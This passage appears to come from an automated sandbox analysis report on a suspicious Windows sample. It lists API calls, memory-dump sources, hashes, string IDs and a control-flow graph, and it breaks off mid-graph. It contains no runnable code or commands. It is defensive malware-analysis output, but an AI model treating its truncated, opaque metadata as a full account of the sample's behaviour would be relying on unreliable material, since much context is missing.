                                                              • Part of subcall function 00501FDD: _wcslen.LIBCMT ref: 00501FF6
                                                              • Part of subcall function 00501FDD: _wcslen.LIBCMT ref: 00502006
                                                              • Part of subcall function 00501FDD: _wcslen.LIBCMT ref: 00502014
                                                              • Part of subcall function 00501FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,004FB371,?,?,00000000,?,?,?), ref: 0050202F
                                                              • Part of subcall function 0050AC04: SetCurrentDirectoryW.KERNELBASE(?,0050AE72,C:\Users\user\Desktop,00000000,0053946A,00000006), ref: 0050AC08
                                                            • _wcslen.LIBCMT ref: 0050AE8B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$CompareCurrentDirectoryString
                                                            • String ID: <P$C:\Users\user\Desktop
                                                            • API String ID: 521417927-84081874
                                                            • Opcode ID: b168c456ca30e66b5fc8277b41103a4a44a2a0616cbe46db5758eea9fe0361df
                                                            • Instruction ID: 5941d0aa101eebc04ef1576487cf848cdc6c27355a091b7b862900ddc1b30b61
                                                            • Opcode Fuzzy Hash: b168c456ca30e66b5fc8277b41103a4a44a2a0616cbe46db5758eea9fe0361df
                                                            • Instruction Fuzzy Hash: 4C014C71D0035A65EF20ABA4DD0EEDE7BACBF48344F000465B605E21D1E6B496858BA5
                                                            APIs
                                                              • Part of subcall function 005197E5: GetLastError.KERNEL32(?,00531030,00514674,00531030,?,?,00513F73,00000050,?,00531030,00000200), ref: 005197E9
                                                              • Part of subcall function 005197E5: _free.LIBCMT ref: 0051981C
                                                              • Part of subcall function 005197E5: SetLastError.KERNEL32(00000000,?,00531030,00000200), ref: 0051985D
                                                              • Part of subcall function 005197E5: _abort.LIBCMT ref: 00519863
                                                            • _abort.LIBCMT ref: 0051BB80
                                                            • _free.LIBCMT ref: 0051BBB4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast_abort_free
                                                            • String ID: pR
                                                            • API String ID: 289325740-2883592124
                                                            • Opcode ID: a5ac2dab4f47bd08a1dd6926edc768817bb28b6648b2f31d3cf61c9cc00f56cc
                                                            • Instruction ID: 387086e1a469093b4e0375cf2566f8eb15005748929d1ce998274857c6232b3c
                                                            • Opcode Fuzzy Hash: a5ac2dab4f47bd08a1dd6926edc768817bb28b6648b2f31d3cf61c9cc00f56cc
                                                            • Instruction Fuzzy Hash: 8201D231D05632DBFB31AF6898426ADBFB1BF54B21B15010AE82467AD5CB356DC28FC1
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: Malloc
                                                            • String ID: (P$ZP
                                                            • API String ID: 2696272793-4232729863
                                                            • Opcode ID: 6556d41109959d2721cfe5ef900f75a1e75c5ea28c6a1287d11d20f1f994f4f0
                                                            • Instruction ID: 31b57788939c68b0b17b0f664bc67a79afca926716ec46fc4e7cf9c676f63311
                                                            • Opcode Fuzzy Hash: 6556d41109959d2721cfe5ef900f75a1e75c5ea28c6a1287d11d20f1f994f4f0
                                                            • Instruction Fuzzy Hash: 7B014B76640208FFDF059FB0DD59CAEBB6DFF143457100155B906D7160E631AA48EB60
                                                            APIs
                                                              • Part of subcall function 0051BF30: GetEnvironmentStringsW.KERNEL32 ref: 0051BF39
                                                              • Part of subcall function 0051BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0051BF5C
                                                              • Part of subcall function 0051BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0051BF82
                                                              • Part of subcall function 0051BF30: _free.LIBCMT ref: 0051BF95
                                                              • Part of subcall function 0051BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0051BFA4
                                                            • _free.LIBCMT ref: 005182AE
                                                            • _free.LIBCMT ref: 005182B5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                            • String ID: 0"U
                                                            • API String ID: 400815659-1738137561
                                                            • Opcode ID: a9c1e2c54327abda3b23a0722a9152729e70828470e024e273bc3785a8500dbd
                                                            • Instruction ID: 485700849ff4aff36f1a71c042a3e7dc1132af2740b88a3dfd61179d6cc3a298
                                                            • Opcode Fuzzy Hash: a9c1e2c54327abda3b23a0722a9152729e70828470e024e273bc3785a8500dbd
                                                            • Instruction Fuzzy Hash: 2EE0E52FA05A5341B67232393C5AAFB0E407FD6339F540B1AF930870D3CF2088C646A2
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,00501206,?), ref: 00500FEA
                                                            • GetLastError.KERNEL32(?), ref: 00500FF6
                                                              • Part of subcall function 004F6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004F6C54
                                                            Strings
                                                            • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00500FFF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                            • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                            • API String ID: 1091760877-2248577382
                                                            • Opcode ID: 4f6a8c68040bf205ff1132c015d7f6f570a0a18d71f42cf4d0424af86cea93be
                                                            • Instruction ID: ae56128ba6a60f19ef34a0847e0a03bb04ddf1d55f73aea5418d41d85f3e0483
                                                            • Opcode Fuzzy Hash: 4f6a8c68040bf205ff1132c015d7f6f570a0a18d71f42cf4d0424af86cea93be
                                                            • Instruction Fuzzy Hash: 95D0C23150452427D62022286C0EC7E3D04AF22731B110709F1B9501E1CA18098666AA
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,004FDA55,?), ref: 004FE2A3
                                                            • FindResourceW.KERNEL32(00000000,RTL,00000005,?,004FDA55,?), ref: 004FE2B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: FindHandleModuleResource
                                                            • String ID: RTL
                                                            • API String ID: 3537982541-834975271
                                                            • Opcode ID: 9680cae16fe645244faf1b705effb263eed4944dd13060793b6b01fffe425971
                                                            • Instruction ID: d17ac957d1f298983fa596e9f445d010b7c66dfe7c6ccaa689ebda6459724563
                                                            • Opcode Fuzzy Hash: 9680cae16fe645244faf1b705effb263eed4944dd13060793b6b01fffe425971
                                                            • Instruction Fuzzy Hash: CFC0123134071066E73017657C0DB436E585F12B11F050459B281E92D1D6ADC54596B0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E467
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: UP$zP
                                                            • API String ID: 1269201914-138241527
                                                            • Opcode ID: bafc012e7323749fb13f6a8a7b037816d20ff92063e2c317bcbc93b068114a7b
                                                            • Instruction ID: 905d97c30192998f6749e5bb1877ccc0899d66e0502d9fadca60cafcc3183d0b
                                                            • Opcode Fuzzy Hash: bafc012e7323749fb13f6a8a7b037816d20ff92063e2c317bcbc93b068114a7b
                                                            • Instruction Fuzzy Hash: 2EB092922581017CB20411142D1BC3E0E09EAC1B51330C82ABA05800D2A8801A0A0432
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E467
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID: pP$zP
                                                            • API String ID: 1269201914-4294329954
                                                            • Opcode ID: 3703d756b2df55fa9574a6ad0dbafbf29ec5e88080e8bafedaf2afa3dcd3ede3
                                                            • Instruction ID: 2d6f76b6e51dcdef317c4c82a4d0773d8b49960ee2cad88cec54317e1b7988df
                                                            • Opcode Fuzzy Hash: 3703d756b2df55fa9574a6ad0dbafbf29ec5e88080e8bafedaf2afa3dcd3ede3
                                                            • Instruction Fuzzy Hash: 60B09282259141ACB20491182C1BC3E0D49EAC1BA1330882AB809C00C2D880580A0432

                                                            Execution Graph

                                                            Execution Coverage:5%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:12
                                                            Total number of Limit Nodes:0
                                                            execution_graph 18728 7ffd9bc7e9fd 18729 7ffd9bc7ea0b SuspendThread 18728->18729 18731 7ffd9bc7eae4 18729->18731 18720 7ffd9bc80369 18721 7ffd9bc80377 CloseHandle 18720->18721 18723 7ffd9bc80454 18721->18723 18732 7ffd9bc80208 18733 7ffd9bc80243 ResumeThread 18732->18733 18735 7ffd9bc80314 18733->18735 18724 7ffd9bc82065 18725 7ffd9bc8207f GetFileAttributesW 18724->18725 18727 7ffd9bc82145 18725->18727
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2026772978.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9bac0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8327b387a1f729acdf2a78b45c510034180ef92e62a30485d3876f13977b9a4c
                                                            • Instruction ID: 13a63934847e0adb1974025e47e686924b1214dfd46ab7a3f015474eefb4a4ea
                                                            • Opcode Fuzzy Hash: 8327b387a1f729acdf2a78b45c510034180ef92e62a30485d3876f13977b9a4c
                                                            • Instruction Fuzzy Hash: 37A1B271A19A8D8FE7A8EF68C8657A97BE1FF55714F4002BEE048D72E6CB781801C740

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2029460942.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9bc70000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: 259829118693a579cd9a455533ec2eb81627fdde950b0cac03a30ad918bc8395
                                                            • Instruction ID: 77c271b0433a712a289b8267cffc18d59b78f38d3152183c4d43747eaff2d939
                                                            • Opcode Fuzzy Hash: 259829118693a579cd9a455533ec2eb81627fdde950b0cac03a30ad918bc8395
                                                            • Instruction Fuzzy Hash: BA516C7090D78C8FDB95DFA8D895AEDBBF0EF56310F0441ABD049DB292DA385846CB11

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 10 7ffd9bc7e9fd-7ffd9bc7ea09 11 7ffd9bc7ea14-7ffd9bc7eae2 SuspendThread 10->11 12 7ffd9bc7ea0b-7ffd9bc7ea13 10->12 16 7ffd9bc7eae4 11->16 17 7ffd9bc7eaea-7ffd9bc7eb34 11->17 12->11 16->17
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2029460942.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9bc70000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID: SuspendThread
                                                            • String ID:
                                                            • API String ID: 3178671153-0
                                                            • Opcode ID: 908194582654c3a62dafa727b247906f0dce2a4c3411ee4b3fb903e67463feff
                                                            • Instruction ID: 73e494ae2fff19e998b5fc780f7494319dd7708be70f2aaa5a4a756d35df0024
                                                            • Opcode Fuzzy Hash: 908194582654c3a62dafa727b247906f0dce2a4c3411ee4b3fb903e67463feff
                                                            • Instruction Fuzzy Hash: 21415D70E0864D8FDF98DFA8D895AEDBBF0FF5A310F10416AD049E7292DA74A845CB41

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 20 7ffd9bc82065-7ffd9bc82143 GetFileAttributesW 24 7ffd9bc8214b-7ffd9bc82189 20->24 25 7ffd9bc82145 20->25 25->24
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2029460942.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9bc70000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 07a23fb8167e3ee434bbcd03f31b32b03e306326c6d4943090bdd521b9c4cc84
                                                            • Instruction ID: fff6016a9360e6637247e102806d27bc09012d217cae554ef2f38b42569b7935
                                                            • Opcode Fuzzy Hash: 07a23fb8167e3ee434bbcd03f31b32b03e306326c6d4943090bdd521b9c4cc84
                                                            • Instruction Fuzzy Hash: 4C412A70E08A0C8FDB98DF98D899BEDBBF0EB5A310F10416AD049E7252DA719845CB40

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2038723965.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9c1c0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: cef2e100d63a6aab4200bb8577165f883d35aa603106cd38728dd860f99c0119
                                                            • Instruction ID: 485503109fb5aea224a5ccb90ac6195249a68b4a9bff061618afa1836517e4c2
                                                            • Opcode Fuzzy Hash: cef2e100d63a6aab4200bb8577165f883d35aa603106cd38728dd860f99c0119
                                                            • Instruction Fuzzy Hash: B7514E32E4860E8FDB69EB98C4655BDB7B1FF58340F1041BAE01AF7296CB356905CB44

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2038723965.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9c1c0000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: c98636ab45c61c70536dc00d515de35582cd4a8fb6b12e6e250da73b81f3be32
                                                            • Instruction ID: 6a654a9ba076ff33754f51690b37d3cf7935c11b887cc922c1b61bb00ea138e8
                                                            • Opcode Fuzzy Hash: c98636ab45c61c70536dc00d515de35582cd4a8fb6b12e6e250da73b81f3be32
                                                            • Instruction Fuzzy Hash: 7C517E32E0864E8FDB69EB98C4625FCB7B1FF58340F5041BEE00AE7296CA346905CB04

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2029460942.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffd9bc70000_hyperruntimemonitorCommon.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID:
                                                            • API String ID: 2962429428-0
                                                            • Opcode ID: 66c97041a14785dd1f5718e4d65f2c55caf0b285c769c967064fb091d60803e6
                                                            • Instruction ID: 3b49f562ebeb45c404c142ee0e36bbd2186ca2c013c6f562cf71dae7c12edea5
                                                            • Opcode Fuzzy Hash: 66c97041a14785dd1f5718e4d65f2c55caf0b285c769c967064fb091d60803e6
                                                            • Instruction Fuzzy Hash: E5416C70D0865C8FDB58DFA8D894BEDBBF0FF5A310F1041AAD049D7292DA74A885CB41

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 105 7ffd9c1c1980-7ffd9c1c199a 107 7ffd9c1c1f9c-7ffd9c1c1faa 105->107 108 7ffd9c1c19a0-7ffd9c1c19b0 105->108 109 7ffd9c1c1fac 107->109 110 7ffd9c1c1fb1-7ffd9c1c1fc0 107->110 111 7ffd9c1c19b6-7ffd9c1c19f1 108->111 112 7ffd9c1c1ffa-7ffd9c1c2010 108->112 109->110 115 7ffd9c1c1a8a-7ffd9c1c1a92 111->115 116 7ffd9c1c205a-7ffd9c1c206d 112->116 117 7ffd9c1c2012-7ffd9c1c2036 112->117 118 7ffd9c1c1a98 115->118 119 7ffd9c1c19f6-7ffd9c1c19ff 115->119 121 7ffd9c1c1aa2-7ffd9c1c1abf 118->121 119->112 120 7ffd9c1c1a05-7ffd9c1c1a10 119->120 122 7ffd9c1c1a16-7ffd9c1c1a2a 120->122 123 7ffd9c1c1a9a-7ffd9c1c1a9e 120->123 126 7ffd9c1c1ac6-7ffd9c1c1ad7 121->126 124 7ffd9c1c1a2c-7ffd9c1c1a43 122->124 125 7ffd9c1c1a83-7ffd9c1c1a87 122->125 123->121 124->112 127 7ffd9c1c1a49-7ffd9c1c1a55 124->127 125->115 131 7ffd9c1c1ad9-7ffd9c1c1aee 126->131 132 7ffd9c1c1af0-7ffd9c1c1aff 126->132 129 7ffd9c1c1a57-7ffd9c1c1a6b 127->129 130 7ffd9c1c1a6f-7ffd9c1c1a80 127->130 129->124 133 7ffd9c1c1a6d 129->133 130->125 131->132 137 7ffd9c1c1b21-7ffd9c1c1b8e 132->137 138 7ffd9c1c1b01-7ffd9c1c1b1c 132->138 133->125 148 7ffd9c1c1b90-7ffd9c1c1ba3 137->148 149 7ffd9c1c1bdf-7ffd9c1c1c26 137->149 144 7ffd9c1c1f59-7ffd9c1c1f8a 138->144 153 7ffd9c1c1f8c-7ffd9c1c1f96 144->153 148->112 152 7ffd9c1c1ba9-7ffd9c1c1bd7 148->152 156 7ffd9c1c1c2a-7ffd9c1c1c4b 149->156 158 7ffd9c1c1bd8-7ffd9c1c1bdd 152->158 153->107 153->108 161 7ffd9c1c1cbc-7ffd9c1c1ccd 156->161 162 7ffd9c1c1c4d-7ffd9c1c1c51 156->162 158->148 160 7ffd9c1c1bde 158->160 160->149 163 7ffd9c1c1cce-7ffd9c1c1cd1 161->163 162->158 165 7ffd9c1c1c53 162->165 166 7ffd9c1c1cd7-7ffd9c1c1cdb 163->166 167 7ffd9c1c1c7c-7ffd9c1c1c8d 165->167 168 7ffd9c1c1cdd-7ffd9c1c1cdf 166->168 167->166 176 7ffd9c1c1c8f-7ffd9c1c1c9d 167->176 169 7ffd9c1c1d29-7ffd9c1c1d31 168->169 170 7ffd9c1c1ce1-7ffd9c1c1cef 168->170 174 7ffd9c1c1d7b-7ffd9c1c1d83 169->174 175 7ffd9c1c1d33-7ffd9c1c1d3c 169->175 172 7ffd9c1c1d60-7ffd9c1c1d75 170->172 173 7ffd9c1c1cf1-7ffd9c1c1cf5 170->173 172->174 173->167 183 7ffd9c1c1cf7 173->183 178 7ffd9c1c1e0b-7ffd9c1c1e19 174->178 179 7ffd9c1c1d89-7ffd9c1c1da2 174->179 180 7ffd9c1c1d3f-7ffd9c1c1d41 175->180 181 7ffd9c1c1c9f-7ffd9c1c1ca3 176->181 182 7ffd9c1c1d0e-7ffd9c1c1d23 176->182 184 7ffd9c1c1e1b-7ffd9c1c1e1d 178->184 185 7ffd9c1c1e8a-7ffd9c1c1e8b 178->185 179->178 186 7ffd9c1c1da4-7ffd9c1c1da5 179->186 187 7ffd9c1c1d43-7ffd9c1c1d45 180->187 188 7ffd9c1c1db2-7ffd9c1c1db4 180->188 181->156 192 7ffd9c1c1ca5 181->192 182->169 183->182 194 7ffd9c1c1e99-7ffd9c1c1e9b 184->194 195 7ffd9c1c1e1f 184->195 193 7ffd9c1c1ebb-7ffd9c1c1ebd 185->193 196 7ffd9c1c1da6-7ffd9c1c1db1 186->196 190 7ffd9c1c1d47 187->190 191 7ffd9c1c1dc1-7ffd9c1c1dc5 187->191 207 7ffd9c1c1db5-7ffd9c1c1db7 188->207 190->163 198 7ffd9c1c1d49 190->198 199 7ffd9c1c1dc7 191->199 200 7ffd9c1c1e41-7ffd9c1c1e5b 191->200 192->161 201 7ffd9c1c1ebf 193->201 202 7ffd9c1c1f2e-7ffd9c1c1f57 193->202 203 7ffd9c1c1f0c 194->203 204 7ffd9c1c1e9d-7ffd9c1c1e9f 194->204 195->196 205 7ffd9c1c1e21 195->205 196->188 206 7ffd9c1c1e2d 196->206 208 7ffd9c1c1d4e-7ffd9c1c1d54 198->208 199->208 209 7ffd9c1c1dc9 199->209 236 7ffd9c1c1e8d-7ffd9c1c1e96 200->236 237 7ffd9c1c1e5d-7ffd9c1c1e6b 200->237 211 7ffd9c1c1edc-7ffd9c1c1eea 201->211 202->144 212 7ffd9c1c1f0e-7ffd9c1c1f10 203->212 213 7ffd9c1c1f7d-7ffd9c1c1f8a 203->213 214 7ffd9c1c1f1b-7ffd9c1c1f1f 204->214 215 7ffd9c1c1ea1 204->215 216 7ffd9c1c1e28-7ffd9c1c1e2c 205->216 217 7ffd9c1c1eae 206->217 218 7ffd9c1c1e2e 206->218 226 7ffd9c1c1e38-7ffd9c1c1e40 207->226 227 7ffd9c1c1db8 207->227 230 7ffd9c1c1dd0-7ffd9c1c1df5 208->230 235 7ffd9c1c1d56 208->235 209->230 231 7ffd9c1c1eeb-7ffd9c1c1ef5 211->231 212->153 232 7ffd9c1c1f12 212->232 213->153 220 7ffd9c1c1f9b 214->220 221 7ffd9c1c1f21 214->221 215->216 225 7ffd9c1c1ea3 215->225 216->206 233 7ffd9c1c1ea8-7ffd9c1c1eac 216->233 228 7ffd9c1c1f2a-7ffd9c1c1f2d 217->228 229 7ffd9c1c1eb0 217->229 218->207 222 7ffd9c1c1e2f-7ffd9c1c1e30 218->222 220->107 221->233 234 7ffd9c1c1f23 221->234 222->226 225->233 226->200 227->180 239 7ffd9c1c1db9-7ffd9c1c1dba 227->239 228->202 241 7ffd9c1c1ef7-7ffd9c1c1f0a 229->241 242 7ffd9c1c1eb2-7ffd9c1c1eba 229->242 248 7ffd9c1c1df8-7ffd9c1c1e09 